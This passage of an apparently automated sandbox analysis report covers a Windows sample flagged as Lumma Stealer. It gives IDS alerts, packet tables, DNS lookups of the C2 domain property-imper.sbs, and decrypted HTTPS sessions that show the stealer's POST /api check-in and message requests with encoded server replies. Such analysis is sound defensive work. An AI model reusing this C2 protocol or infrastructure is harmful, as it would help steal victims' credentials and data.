                                                                              .taggant0x4a30000x30000x220009f278ec934636db7915e4dda8cb13fdFalse0.05824908088235294DOS executable (COM)0.7634146160213555IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                              Resources

                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                              RT_MANIFEST0x4a170c0x256ASCII text, with CRLF line terminators0.5100334448160535

                                                                              Imports

                                                                              DLLImport
                                                                              kernel32.dlllstrcpy

                                                                              Network Behavior

                                                                              Suricata IDS Alerts

                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                              2024-11-24T14:56:18.868806+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749701172.67.162.84443TCP
                                                                              2024-11-24T14:56:19.547647+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.749701172.67.162.84443TCP
                                                                              2024-11-24T14:56:19.547647+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749701172.67.162.84443TCP
                                                                              2024-11-24T14:56:20.867552+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749702172.67.162.84443TCP
                                                                              2024-11-24T14:56:21.572038+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.749702172.67.162.84443TCP
                                                                              2024-11-24T14:56:21.572038+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749702172.67.162.84443TCP
                                                                              2024-11-24T14:56:23.201819+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749704172.67.162.84443TCP
                                                                              2024-11-24T14:56:24.205397+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.749704172.67.162.84443TCP
                                                                              2024-11-24T14:56:25.561861+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749705172.67.162.84443TCP
                                                                              2024-11-24T14:56:28.430843+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749716172.67.162.84443TCP
                                                                              2024-11-24T14:56:30.795353+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749722172.67.162.84443TCP
                                                                              2024-11-24T14:56:33.237543+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749728172.67.162.84443TCP
                                                                              2024-11-24T14:56:33.242954+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.749728172.67.162.84443TCP
                                                                              2024-11-24T14:56:37.184361+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749743172.67.162.84443TCP

                                                                              Network Port Distribution

                                                                              TCP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Nov 24, 2024 14:56:17.583039045 CET49701443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:17.583086967 CET44349701172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:17.583157063 CET49701443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:17.592488050 CET49701443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:17.592504978 CET44349701172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:18.868736982 CET44349701172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:18.868805885 CET49701443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:18.876765966 CET49701443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:18.876779079 CET44349701172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:18.877193928 CET44349701172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:18.922429085 CET49701443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:18.930843115 CET49701443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:18.930993080 CET49701443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:18.931082010 CET44349701172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:19.547669888 CET44349701172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:19.547795057 CET44349701172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:19.547844887 CET49701443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:19.550167084 CET49701443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:19.550179005 CET44349701172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:19.607402086 CET49702443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:19.607440948 CET44349702172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:19.607506990 CET49702443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:19.607775927 CET49702443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:19.607805967 CET44349702172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:20.867460012 CET44349702172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:20.867552042 CET49702443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:20.868967056 CET49702443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:20.868989944 CET44349702172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:20.869249105 CET44349702172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:20.876663923 CET49702443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:20.876703978 CET49702443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:20.876759052 CET44349702172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:21.572026014 CET44349702172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:21.572060108 CET44349702172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:21.572088003 CET44349702172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:21.572120905 CET44349702172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:21.572127104 CET49702443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:21.572144985 CET44349702172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:21.572155952 CET44349702172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:21.572160959 CET49702443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:21.572189093 CET49702443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:21.572204113 CET44349702172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:21.580280066 CET44349702172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:21.580328941 CET49702443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:21.580358028 CET44349702172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:21.596936941 CET44349702172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:21.596986055 CET49702443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:21.597013950 CET44349702172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:21.641196012 CET49702443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:21.691859961 CET44349702172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:21.734937906 CET49702443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:21.772938013 CET44349702172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:21.772995949 CET44349702172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:21.773037910 CET49702443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:21.773047924 CET44349702172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:21.773077011 CET44349702172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:21.773118019 CET49702443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:21.773190975 CET49702443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:21.773201942 CET44349702172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:21.773211956 CET49702443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:21.773217916 CET44349702172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:21.888534069 CET49704443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:21.888562918 CET44349704172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:21.888675928 CET49704443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:21.888987064 CET49704443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:21.888998032 CET44349704172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:23.201740026 CET44349704172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:23.201818943 CET49704443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:23.203144073 CET49704443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:23.203160048 CET44349704172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:23.203494072 CET44349704172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:23.207171917 CET49704443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:23.207321882 CET49704443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:23.207355022 CET44349704172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:24.205430984 CET44349704172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:24.205530882 CET44349704172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:24.205614090 CET49704443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:24.209427118 CET49704443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:24.209445953 CET44349704172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:24.336150885 CET49705443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:24.336175919 CET44349705172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:24.336272001 CET49705443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:24.336565018 CET49705443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:24.336581945 CET44349705172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:25.561767101 CET44349705172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:25.561861038 CET49705443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:25.563644886 CET49705443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:25.563651085 CET44349705172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:25.563905954 CET44349705172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:25.565243006 CET49705443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:25.565452099 CET49705443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:25.565485001 CET44349705172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:25.565613985 CET49705443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:25.607333899 CET44349705172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:26.459044933 CET44349705172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:26.459137917 CET44349705172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:26.459183931 CET49705443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:26.461832047 CET49705443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:26.461847067 CET44349705172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:27.151926994 CET49716443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:27.151952982 CET44349716172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:27.152020931 CET49716443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:27.152350903 CET49716443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:27.152363062 CET44349716172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:28.430768013 CET44349716172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:28.430843115 CET49716443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:28.432123899 CET49716443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:28.432133913 CET44349716172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:28.432462931 CET44349716172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:28.433643103 CET49716443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:28.433809996 CET49716443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:28.433844090 CET44349716172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:28.433907986 CET49716443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:28.433914900 CET44349716172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:29.300137043 CET44349716172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:29.300379992 CET44349716172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:29.300456047 CET49716443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:29.300605059 CET49716443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:29.300620079 CET44349716172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:29.517086983 CET49722443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:29.517117977 CET44349722172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:29.517183065 CET49722443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:29.517600060 CET49722443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:29.517616987 CET44349722172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:30.795121908 CET44349722172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:30.795352936 CET49722443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:30.796761990 CET49722443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:30.796783924 CET44349722172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:30.797575951 CET44349722172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:30.798957109 CET49722443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:30.799052954 CET49722443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:30.799066067 CET44349722172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:31.513550997 CET44349722172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:31.513839006 CET44349722172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:31.513851881 CET49722443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:31.513892889 CET49722443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:31.933514118 CET49728443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:31.933533907 CET44349728172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:31.933609009 CET49728443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:31.933952093 CET49728443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:31.933963060 CET44349728172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:33.237468004 CET44349728172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:33.237543106 CET49728443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:33.238805056 CET49728443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:33.238811016 CET44349728172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:33.239054918 CET44349728172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:33.240418911 CET49728443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:33.241158962 CET49728443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:33.241197109 CET44349728172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:33.241317987 CET49728443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:33.241352081 CET44349728172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:33.242839098 CET49728443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:33.242883921 CET44349728172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:33.243015051 CET49728443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:33.243045092 CET44349728172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:33.243196011 CET49728443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:33.243232965 CET44349728172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:33.243474960 CET49728443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:33.243513107 CET44349728172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:33.243521929 CET49728443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:33.243531942 CET44349728172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:33.243647099 CET49728443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:33.243665934 CET44349728172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:33.243685961 CET49728443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:33.243797064 CET49728443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:33.243822098 CET49728443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:33.291332960 CET44349728172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:33.291502953 CET49728443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:33.291524887 CET44349728172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:33.291553020 CET49728443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:33.291560888 CET44349728172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:33.291575909 CET49728443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:33.291582108 CET44349728172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:33.291699886 CET49728443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:33.291704893 CET44349728172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:36.985097885 CET44349728172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:36.985372066 CET44349728172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:36.985439062 CET49728443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:36.985477924 CET49728443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:36.985491037 CET44349728172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:36.995250940 CET49743443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:36.995270967 CET44349743172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:36.995347977 CET49743443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:36.995642900 CET49743443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:36.995654106 CET44349743172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:37.184360981 CET49743443192.168.2.7172.67.162.84

                                                                              UDP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Nov 24, 2024 14:56:17.200165987 CET6216253192.168.2.71.1.1.1
                                                                              Nov 24, 2024 14:56:17.566041946 CET53621621.1.1.1192.168.2.7

                                                                              DNS Queries

                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                              Nov 24, 2024 14:56:17.200165987 CET192.168.2.71.1.1.10xd36cStandard query (0)property-imper.sbsA (IP address)IN (0x0001)false

                                                                              DNS Answers

                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                              Nov 24, 2024 14:56:17.566041946 CET1.1.1.1192.168.2.70xd36cNo error (0)property-imper.sbs172.67.162.84A (IP address)IN (0x0001)false
                                                                              Nov 24, 2024 14:56:17.566041946 CET1.1.1.1192.168.2.70xd36cNo error (0)property-imper.sbs104.21.33.116A (IP address)IN (0x0001)false

                                                                              HTTP Request Dependency Graph

                                                                              • property-imper.sbs

                                                                              HTTPS Proxied Packets

                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.749701172.67.162.844437472C:\Users\user\Desktop\file.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-11-24 13:56:18 UTC265OUTPOST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 8
                                                                              Host: property-imper.sbs
                                                                              2024-11-24 13:56:18 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                              Data Ascii: act=life
                                                                              2024-11-24 13:56:19 UTC1013INHTTP/1.1 200 OK
                                                                              Date: Sun, 24 Nov 2024 13:56:19 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=iq6dq5rlpu2ncs2gptosfbr4v9; expires=Thu, 20-Mar-2025 07:42:58 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              cf-cache-status: DYNAMIC
                                                                              vary: accept-encoding
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ljhBezvfy4Ic3eCjJyyXD%2BHn3p6Si%2BL46Y4S2ZVIJQgbHXwIXVSEAVqSi682xtgMKJFl11MZ5L2E8GgITHJzct9BSyDgcjG7P27l9btfeAwXVpySQ8iIK1dvGycbm2c%2BhFjNmDc%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8e79e6d399963344-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2362&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=909&delivery_rate=1576673&cwnd=199&unsent_bytes=0&cid=df1921e0f481e16d&ts=703&x=0"
                                                                              2024-11-24 13:56:19 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                              Data Ascii: 2ok
                                                                              2024-11-24 13:56:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              1192.168.2.749702172.67.162.844437472C:\Users\user\Desktop\file.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-11-24 13:56:20 UTC266OUTPOST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 53
                                                                              Host: property-imper.sbs
                                                                              2024-11-24 13:56:20 UTC53OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d
                                                                              Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
                                                                              2024-11-24 13:56:21 UTC1013INHTTP/1.1 200 OK
                                                                              Date: Sun, 24 Nov 2024 13:56:21 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=lrm8v77n9ufsk5m2ss2boi7ft1; expires=Thu, 20-Mar-2025 07:43:00 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              cf-cache-status: DYNAMIC
                                                                              vary: accept-encoding
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MaBLZDGF6kK1OUxiybanBguvk1lsltaDgRGMUhzN%2FciHCb8Ty4rm5YkAL0RI7TXqgJA74msBdHhQdzFGiU8O4g%2FsVY2szwGk7GDFvwHhEkM6Tkc9ScLcxT3jqI2YIsh9x%2FWgGoY%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8e79e6e03dfc421d-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1728&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=955&delivery_rate=1638608&cwnd=190&unsent_bytes=0&cid=6219a4baf237aeda&ts=712&x=0"
                                                                              2024-11-24 13:56:21 UTC356INData Raw: 63 63 37 0d 0a 69 55 59 35 6c 66 35 55 54 6e 46 34 71 4c 49 6f 58 33 57 32 72 50 77 70 79 48 6e 30 70 4d 73 68 52 4f 63 75 33 6c 77 52 79 48 58 79 5a 45 2b 33 78 47 42 69 55 77 76 4e 6b 42 49 72 42 38 50 4a 30 41 75 70 48 64 61 65 72 55 41 6f 6c 45 76 79 66 6d 65 6c 56 37 4d 67 57 50 6d 4e 4d 57 4a 54 48 64 43 51 45 67 51 4f 6c 4d 6d 53 43 2f 4a 62 6b 63 36 70 51 43 69 46 54 37 55 7a 59 61 51 57 34 53 70 65 2f 5a 73 33 4b 68 41 55 78 64 64 4e 4f 68 54 63 77 70 56 45 6f 42 54 57 69 4f 6c 45 50 73 55 55 2f 42 46 30 76 42 54 45 4a 30 72 2b 33 43 6c 69 43 6c 72 4e 33 41 70 6c 56 39 66 4a 6e 6b 57 75 48 5a 2f 4d 6f 30 6b 67 68 45 71 30 4c 48 69 75 48 65 45 6b 58 66 79 52 50 6a 34 64 48 73 4c 63 53 7a 41 55 6c 49 44 65 54 4c 4a 62 7a 6f 62 36 63 53 57 55 58 61
                                                                              Data Ascii: cc7iUY5lf5UTnF4qLIoX3W2rPwpyHn0pMshROcu3lwRyHXyZE+3xGBiUwvNkBIrB8PJ0AupHdaerUAolEvyfmelV7MgWPmNMWJTHdCQEgQOlMmSC/Jbkc6pQCiFT7UzYaQW4Spe/Zs3KhAUxddNOhTcwpVEoBTWiOlEPsUU/BF0vBTEJ0r+3CliClrN3AplV9fJnkWuHZ/Mo0kghEq0LHiuHeEkXfyRPj4dHsLcSzAUlIDeTLJbzob6cSWUXa
                                                                              2024-11-24 13:56:21 UTC1369INData Raw: 42 45 73 48 62 54 79 38 63 33 63 4f 54 53 36 63 52 6d 63 57 70 52 43 79 50 51 37 59 36 66 71 63 52 36 79 51 62 75 64 77 78 4e 46 4e 43 69 76 4e 50 4c 52 44 59 32 4e 78 78 36 67 54 59 33 2b 6c 45 4b 73 55 55 2f 44 5a 32 71 52 54 67 4b 31 6a 2f 6c 79 51 73 41 52 7a 48 31 56 67 37 45 74 72 45 6e 56 6d 67 46 5a 44 46 6f 45 67 76 67 45 75 34 66 6a 33 71 45 50 4e 6b 41 37 65 39 4f 79 63 66 45 4e 33 51 43 69 4a 5a 7a 59 36 5a 52 2b 70 44 31 73 4b 6f 52 79 65 42 51 72 49 36 66 36 77 5a 35 69 74 64 2f 5a 77 78 4a 68 73 53 79 39 31 42 4d 68 66 52 77 35 70 4e 70 68 71 54 68 75 63 44 49 5a 30 4d 35 48 35 64 72 52 54 35 5a 6d 37 30 6b 6a 67 72 42 56 72 56 6e 6c 4e 39 45 4e 69 4f 78 67 75 6b 48 70 6e 55 71 46 45 6a 69 31 36 77 4f 33 57 6e 46 4f 55 6b 58 76 43 52 4f 43
                                                                              Data Ascii: BEsHbTy8c3cOTS6cRmcWpRCyPQ7Y6fqcR6yQbudwxNFNCivNPLRDY2Nxx6gTY3+lEKsUU/DZ2qRTgK1j/lyQsARzH1Vg7EtrEnVmgFZDFoEgvgEu4fj3qEPNkA7e9OycfEN3QCiJZzY6ZR+pD1sKoRyeBQrI6f6wZ5itd/ZwxJhsSy91BMhfRw5pNphqThucDIZ0M5H5drRT5Zm70kjgrBVrVnlN9ENiOxgukHpnUqFEji16wO3WnFOUkXvCROC
